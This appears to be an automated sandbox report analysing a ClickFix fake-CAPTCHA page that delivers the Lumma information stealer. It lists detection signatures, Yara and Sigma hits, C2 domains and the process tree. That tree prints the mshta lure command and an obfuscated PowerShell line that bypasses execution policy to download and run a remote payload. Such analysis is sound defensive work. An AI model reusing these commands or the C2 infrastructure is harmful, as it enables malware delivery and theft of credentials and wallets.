Windows
Analysis Report
https://patiooutletmaipu.cl/tiendas/head/
Overview
Detection
LummaC, CAPTCHA Scam ClickFix, LummaC Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Antivirus detection for URL or domain
Detect drive by download via clipboard copy & paste
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected CAPTCHA Scam ClickFix
Yara detected LummaC Stealer
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious powershell code related to unpacking or dynamic code loading
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for reading data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to detect virtual machines (SLDT)
Contains functionality to read the clipboard data
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTML page contains hidden javascript code
HTML page contains obfuscated script src
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found; this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64_ra
- chrome.exe (PID: 6836 cmdline:
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
- chrome.exe (PID: 7060 cmdline:
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 --field-trial-handle=1944,i,6179570645795824740,2383523467287587005,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
- chrome.exe (PID: 1632 cmdline:
"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://patiooutletmaipu.cl/tiendas/head/" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
- mshta.exe (PID: 7780 cmdline:
"C:\Windows\system32\mshta.exe" https://solve.bogx.org/awjsx.captcha?u=94e37336-e4b6-4f92-a196-add1c5c06323 # ? ''I am not a robot - reCAPTCHA Verification ID: 9977'' MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
- powershell.exe (PID: 7936 cmdline:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc [base64 (UTF-16LE) encoded command omitted from this record; it decodes to a Start-Process of "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden with the -w hidden -ep bypass -nop -Command line recorded under PID 8096] MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 7944 cmdline:
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 8096 cmdline:
"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -*;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|Where-Object{$_.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|Where-Object{$_.Name-like'*om*e'}).Name).Invoke('N*-O*',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://d1.exploredairyaptitude.shop/sh.bin';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value|Member)|Where-Object{$_.Name-like'*nl*g'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs() MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- conhost.exe (PID: 8104 cmdline:
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 5932 cmdline:
"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link
---|---|---|---|---
Lumma Stealer, LummaC2 Stealer | Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in the C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. | No Attribution | |
{"C2 url": ["truculengisau.biz", "marketlumpe.biz", "nuttyshopr.biz", "grandiouseziu.biz", "fraggielek.biz", "beliefbidu.cyou", "littlenotii.biz", "punishzement.biz", "spookycappy.biz"], "Build id": "jMw1IE--SHELLS"}
Source | Rule | Description | Author | Strings
---|---|---|---|---
| | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security | |
| | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security | |

Source | Rule | Description | Author | Strings
---|---|---|---|---
| | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | |
| | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | |
| | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security | |

Source | Rule | Description | Author | Strings
---|---|---|---|---
| | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | |
| | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | |

Source | Rule | Description | Author | Strings
---|---|---|---|---
| | JoeSecurity_CAPTCHAScam | Yara detected CAPTCHA Scam/ ClickFix | Joe Security | |
| | JoeSecurity_CAPTCHAScam | Yara detected CAPTCHA Scam/ ClickFix | Joe Security | |
| | JoeSecurity_CAPTCHAScam | Yara detected CAPTCHA Scam/ ClickFix | Joe Security | |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: |